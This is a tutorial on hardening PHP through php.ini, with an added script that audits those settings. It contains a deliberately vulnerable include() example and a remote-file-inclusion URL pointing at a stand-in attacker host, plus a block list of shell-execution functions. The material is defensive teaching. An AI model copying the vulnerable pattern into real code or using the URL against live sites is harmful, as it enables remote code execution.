PHP.INI Based Web Security

Hardening PHP Security: A PHP developer needs to secure a website at two layers: the application and the server. Start by identifying the weakest link. The guiding principle is to trust nothing, including the current server and application configuration and, most importantly, user-supplied data.

Why Attacks Happen:
1- To steal other users' sessions
2- To damage the website's credibility
3- To steal visitor information and browsing habits
4- To steal information stored in the database
5- To deny users access to website resources
6- To spread malicious code by injecting it into users' computers.

To counter these threats, below are some security settings a PHP developer can add to the php.ini file.
1- Prevent Information Disclosure:
display_errors = Off //syntax
Turn it 'On' only in the development environment; it must be 'Off' in production. An attacker can use error messages to learn about your file system layout, your code, the framework in use and possible vulnerabilities, simply by reading what the server prints. Keep logging the errors (log_errors) so that they reach the server log instead of the browser.

2- Disable Globals
register_globals = off //syntax
(This directive was deprecated in PHP 5.3 and removed in PHP 5.4, so on any supported PHP version it no longer exists; the setting still matters on legacy servers.)
To understand this, we first need to understand global variables in PHP. A PHP global variable is one that can be accessed from anywhere regardless of scope; it is accessible from any PHP file without including any other file. The superglobals are:
$GLOBALS
$_SERVER
$_REQUEST
$_POST
$_GET
$_FILES
$_ENV
$_COOKIE
$_SESSION
Think about a scenario where register_globals is on. Assume the application stores a session variable $_SESSION['user_id'].
With register_globals on, every request parameter is imported as a plain PHP variable, so a request parameter named user_id becomes $user_id without the code ever touching $_SESSION['user_id']. If the application checks $user_id instead of $_SESSION['user_id'], a hacker can obtain another user's session simply by supplying that parameter, overriding the global variable.

3- Disable Remote File Includes.
Suggested Setting
allow_url_fopen = off //syntax
allow_url_include = off //syntax
A large number of the code injection vulnerabilities reported in PHP-based web applications are due to allow_url_fopen being enabled combined with poor input filtering.
Consider a PHP file named index.php with the following code (deliberately vulnerable: the file name is taken straight from the query string).
<?php
$includeFile = $_GET['file_name']; // untrusted input, no validation
include($includeFile);
?>
In this case, with no input validation in place, a hacker can exploit this vulnerability by requesting a URL such as
http://example.com/index.php?file_name=http://hackerfile.com/remote_file
Note that allow_url_include = off only blocks the remote case; the same code still includes arbitrary local files, so the input must still be validated against a whitelist of permitted file names.
Disable PHP execution in the directory where users upload files:
Here the developer can add layers of defence on both the client and the server:
1- Check the file extension on the client side (a convenience for the user only; it can be bypassed and must not be relied on).
2- Check the file extension and size on the server side.
3- Prevent execution of uploaded files with an .htaccess file in the upload directory:
php_flag engine off
or, equivalently, in the Apache configuration (a <Directory> block is not permitted inside .htaccess):
<Directory /var/www/vhosts/yourdomain.com/httpdocs/your_upload_dir/>
Options None
AllowOverride None
php_flag engine off
order deny,allow
deny from all
</Directory>
Two caveats: php_flag only takes effect under mod_php (with PHP-FPM the PHP handler must be disabled for that directory in the proxy configuration instead), and the last two lines deny all HTTP access to the directory, so uploaded files can no longer be served directly from it; drop them if the files must remain downloadable.

HttpOnly Cookie: We can stop client-side script in the browser from reading the session cookie by setting the HttpOnly cookie flag.
session.cookie_httponly = 1 //syntax
The flag can also be set per cookie from PHP:
<?php
// Arguments: name, value, expire, path, domain, secure, httponly
$token = bin2hex(random_bytes(16));
setcookie('remember_me', $token, time() + 86400, '/', '', true, true);
?>
But in that case the developer can forget to pass httponly = true. It is better to enforce it server-side in php.ini rather than trusting the developer every time a cookie is set.

Session Save Path: The session save path on the server must not be somewhere a hacker can access directly: it should be outside the web root and not readable by other users on the host.
It would be something like session.save_path = /var/lib/php

Disable Unnecessary Functions:
PHP includes many functions that you will likely never need. However, they can be very helpful to hackers; disabling them will probably not affect your site but will make a hacker's job much more difficult. Test the application after changing this list, as set_time_limit and phpinfo in particular are used by some legitimate code. The directive is a single comma-separated line in php.ini:
disable_functions = php_uname, getmyuid, getmypid, passthru, leak, listen, diskfreespace, tmpfile, link, ignore_user_abort, shell_exec, dl, set_time_limit, exec, system, highlight_file, source, show_source, fpassthru, virtual, posix_ctermid, posix_getcwd, posix_getegid, posix_geteuid, posix_getgid, posix_getgrgid, posix_getgrnam, posix_getgroups, posix_getlogin, posix_getpgid, posix_getpgrp, posix_getpid, posix_getppid, posix_getpwnam, posix_getpwuid, posix_getrlimit, posix_getsid, posix_getuid, posix_isatty, posix_kill, posix_mkfifo, posix_setegid, posix_seteuid, posix_setgid, posix_setpgid, posix_setsid, posix_setuid, posix_times, posix_ttyname, posix_uname, proc_open, proc_close, proc_get_status, proc_nice, phpinfo
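To check that the settings from this post are actually in effect on a server, here is an added audit script (my own example, not part of the original post) that reads the running configuration with ini_get() and reports every directive that is not in its hardened state. It assumes PHP 8.0 or later and should be run with the same SAPI the web server uses, because the CLI's php.ini can differ from the web server's.

```php
<?php
// Added example: audit the running php.ini against the hardening settings above.
// Assumes PHP 8.0+ (str_starts_with). Run under the web SAPI (php-cgi, or
// briefly from the web root) so that ini_get() reflects the server's php.ini.

function iniIsOff(string $name): bool {
    // Off / 0 / empty all come back from ini_get() as falsy strings
    $value = strtolower((string) ini_get($name));
    return in_array($value, ['', '0', 'off', 'false', 'no'], true);
}

function auditPhpIni(array $mustBeDisabled): array {
    $findings = [];
    // 1. Information disclosure
    if (!iniIsOff('display_errors')) {
        $findings[] = 'display_errors is on: set display_errors = Off';
    }
    // 3. Remote file inclusion
    foreach (['allow_url_fopen', 'allow_url_include'] as $directive) {
        if (!iniIsOff($directive)) {
            $findings[] = "$directive is on: set $directive = Off";
        }
    }
    // HttpOnly session cookie
    if (iniIsOff('session.cookie_httponly')) {
        $findings[] = 'session.cookie_httponly is off: set it to 1';
    }
    // Session files must live outside the document root
    $savePath = (string) ini_get('session.save_path');
    $docRoot  = (string) ($_SERVER['DOCUMENT_ROOT'] ?? '');
    if ($savePath !== '' && $docRoot !== ''
        && str_starts_with(realpath($savePath) ?: $savePath, realpath($docRoot) ?: $docRoot)) {
        $findings[] = "session.save_path ($savePath) is inside the document root";
    }
    // disable_functions is a comma-separated list; find what it does not cover
    $disabled = array_map('trim', explode(',', (string) ini_get('disable_functions')));
    $missing  = array_diff($mustBeDisabled, $disabled);
    if ($missing !== []) {
        $findings[] = 'disable_functions does not cover: ' . implode(', ', $missing);
    }
    return $findings;
}

// A subset of the list in the post; extend it to the full list for your server.
$findings = auditPhpIni(['exec', 'shell_exec', 'system', 'passthru', 'proc_open', 'phpinfo', 'dl']);
if ($findings === []) {
    echo "All checked php.ini hardening settings are in place\n";
    exit(0);
}
foreach ($findings as $finding) {
    echo "[!] $finding\n";
}
exit(1);
```

The script exits non-zero when anything is found, so it can be run from a deployment pipeline to catch a php.ini that was overwritten by a package upgrade.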

In my next post, I will try to explain some security setting which we can add in Apache configuration file.
